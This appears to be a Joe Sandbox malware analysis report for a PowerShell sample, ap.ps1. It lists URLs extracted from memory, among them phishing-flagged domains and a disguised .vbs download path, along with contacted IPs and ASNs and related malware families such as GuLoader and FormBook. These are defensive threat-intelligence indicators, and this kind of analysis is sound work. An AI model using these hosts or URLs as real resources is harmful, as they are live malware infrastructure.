https://www.almrwad.com/wh/Su | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/Subordineren | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.erp-royal-crown.info/wh/Subordinerende | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.almrwad.com/ | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/Subordinerend | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://www.erp-royal-crown.info | powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F219EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.almrwad.c | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info | powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.fornid.com/90-maschere-per-saldatura | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1599621623.000002CD57BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1599621623.000002CD57D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1428247268.000001B6547E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31357000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.erp-royal-crown.info/wh/Subordine | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://www.pineappletech.ae | powershell.exe, 00000002.00000002.1544764265.000002CD49AD7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/133-occhiali-protettivi | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.i | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/themes/PRS070158/css/megnor/custom.css | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1544764265.000002CD47B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B644771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F211A1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.almrwad.com/wh/Subordin | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/ | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.almrwad.com/wh/Subordinerendes7 | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Subord | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B645A83000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.fornid.com/contattaci | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.almrwad.com/wh/ | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Subordinerendes | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://go.micro | powershell.exe, 00000002.00000002.1544764265.000002CD487B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B6456C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B645D99000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.almrwad.com | powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22AA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22220000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com | powershell.exe, 00000002.00000002.1544764265.000002CD49658000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Subordinerende | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Subordinerendes78.s | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.almrwad.com/wh/Subordinerendes78.sm | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fornid.com/ | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/wh/List%20of%20rualquiruald%20itualms%20and%20sualrvicuals.pdf | powershell.exe, 00000002.00000002.1544764265.000002CD491B2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://almrwad.com | powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22247000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/144-filtri-per-maschere | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Subordinerendes78 | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/Subord | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3 | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/w | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.erp-royal-crown. | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://fornid.com | powershell.exe, 00000002.00000002.1544764265.000002CD4965D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/Subordinere | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.erp-royal-crown.info/wh | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.fornid.com/sitemap | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/145-maschere-antigas | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.almrwad.com/wh/Subordinerend | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/Subordi | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.erp-royal-crown.info/wh/Subor | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.fornid.com/il-mio-account | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/Subo | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://www.almrwad.com | powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22247000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Subordinere | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.in | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 00000005.00000002.1410489118.000001B6456C4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.almrwad.com/wh/Subordi | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.co | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Subordinerendes78. | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://erp-royal-crown.info | powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F219EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://www.erp-royal-crown.info/wh/Subordinerendes | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://contoso.com/ | powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.erp-royal-crown.info/wh/Subordinerendes78.s | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.fornid.com/img/logo.jpg | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Sub | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/Subordin | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.almrwad.com/wh/Subo | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://blog.fornid.com/ | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1599621623.000002CD57BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1599621623.000002CD57D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1428247268.000001B6547E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31357000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.erp-royal-crown.info/wh/Subordinerendes78 | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://www.fornid.com/content/13-international-shipments | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Subor | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad. | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000005.00000002.1410489118.000001B645D99000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.erp-royal-crown.info/wh/Subordinerendes7 | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://www.fornid.com | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4965D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/cerca | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/ | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.pinualapplualtualch.aual/na/mg.vbs | powershell.exe, 00000002.00000002.1544764265.000002CD49808000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Subordineren | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.m | powershell.exe, 00000005.00000002.1433777398.000001B65CBF9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.inf | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
91.193.42.13 | www.pineappletech.ae | Belgium | 48694 | ITFPL | false
93.95.216.175 | fornid.com | Italy | 52030 | SERVERPLAN-ASIT | true
148.251.114.233 | erp-royal-crown.info | Germany | 24940 | HETZNER-ASDE | false
184.171.244.231 | almrwad.com | United States | 33182 | DIMENOCUS | false
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1568999
                                                          Start date and time:2024-12-05 10:38:12 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 20s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:17
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:ap.ps1
                                                          Detection:MAL
                                                          Classification:mal100.expl.evad.winPS1@11/13@4/4
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 15
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .ps1
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 7544 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 8104 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 8156 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: ap.ps1
Time | Type | Description
04:39:09 | API Interceptor | 1604307x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 91.193.42.13
• ni.ps1: malicious, Unknown
• qc.ps1: malicious, GuLoader, RHADAMANTHYS
• List of Required items and services.zip: malicious, GuLoader, RHADAMANTHYS
Match: 93.95.216.175
• ni.ps1: malicious, Unknown
Match: 148.251.114.233
• PURCHASE ORDER-6350.exe: malicious, FormBook; context: www.eslameldaramlly.site/30vc/
• PURCHASE ORDER-6350.exe: malicious, FormBook; context: www.eslameldaramlly.site/30vc/
• PO5118000306 pdf.exe: malicious, FormBook; context: www.eslameldaramlly.site/fchs/
• PO23100072.exe: malicious, FormBook; context: www.eslameldaramlly.site/30vc/
• PO-000001488.exe: malicious, FormBook; context: www.eslameldaramlly.site/30vc/
• PURCHASE ORDER-6350.exe: malicious, FormBook; context: www.eslameldaramlly.site/30vc/
Match: 184.171.244.231
• ni.ps1: malicious, Unknown
• qc.ps1: malicious, GuLoader, RHADAMANTHYS
• yd2.vbs: malicious, GuLoader, RHADAMANTHYS
• List of Required items and services.zip: malicious, GuLoader, RHADAMANTHYS
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: www.pineappletech.ae
• ni.ps1: malicious, Unknown; context: 91.193.42.13
• qc.ps1: malicious, GuLoader, RHADAMANTHYS; context: 91.193.42.13
• List of Required items and services.zip: malicious, GuLoader, RHADAMANTHYS; context: 91.193.42.13
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: ITFPL
• ni.ps1: malicious, Unknown; context: 91.193.42.13
• qc.ps1: malicious, GuLoader, RHADAMANTHYS; context: 91.193.42.13
• List of Required items and services.zip: malicious, GuLoader, RHADAMANTHYS; context: 91.193.42.13
• KgQJ0dIs3A.exe: malicious, Amadey, zgRAT; context: 91.193.43.180
• 7GC8osUQMq.exe: malicious, Amadey; context: 91.193.43.180
• Y3KkfxEZuo.exe: malicious, zgRAT; context: 91.193.43.180
• wqb7dL448k.exe: malicious, Amadey, Xmrig, zgRAT; context: 91.193.43.180
• Oupxwi.js: malicious, Qbot; context: 91.193.43.119
• Nyyne.js: malicious, Qbot; context: 91.193.43.119
• Nyyne.js: malicious, Unknown; context: 91.193.43.119
Match: HETZNER-ASDE
• ni.ps1: malicious, Unknown; context: 148.251.114.233
• UPDATED CONTRACT.exe: malicious, FormBook; context: 88.99.61.52
• https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C: malicious, Captcha Phish, HTMLPhisher; context: 5.9.227.67
• Ttok18.exe: malicious, Vidar; context: 159.69.102.165
• jtkhikadjthsad.exe: malicious, Vidar; context: 159.69.102.165
• file.exe: malicious, Vidar; context: 159.69.102.165
• rukT6hBo6P.exe: malicious, Phemedrone Stealer; context: 49.12.121.47
• o26qobnkQI.exe: malicious, Vidar; context: 159.69.102.165
• https://ammyy.com/en/downloads.html: malicious, Flawedammyy; context: 136.243.18.118
• Advertising Agreement for Youtube Cooperation.scr: malicious, LummaC Stealer; context: 148.251.0.164
Match: SERVERPLAN-ASIT
• ni.ps1: malicious, Unknown; context: 93.95.216.175
• untrippingvT.ps1: malicious, Unknown; context: 46.254.34.201
• yT6gJFN0SR.lnk: malicious, Unknown; context: 46.254.34.201
• mX3IqRiuFo.lnk: malicious, Unknown; context: 46.254.34.201
• 6K2g0GMmIE.lnk: malicious, Unknown; context: 46.254.34.201
• G9eWTvswoH.lnk: malicious, Unknown; context: 46.254.34.201
• la.bot.mips.elf: malicious, Unknown; context: 193.70.147.14
• Ordine Electricas BC Corp PO EDC0969388.bat: malicious, GuLoader; context: 185.81.4.143
• Play_VM-Now(Gdunphy)CQDM.htm: malicious, Unknown; context: 93.95.216.8
• Steel Dynamics.pdf: malicious, Unknown; context: 93.95.216.8
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
• ni.ps1: malicious, Unknown; context: 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
• REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exe: malicious, GuLoader, MassLogger RAT; context: 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
• RFQ.exe: malicious, AgentTesla, PureLog Stealer; context: 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
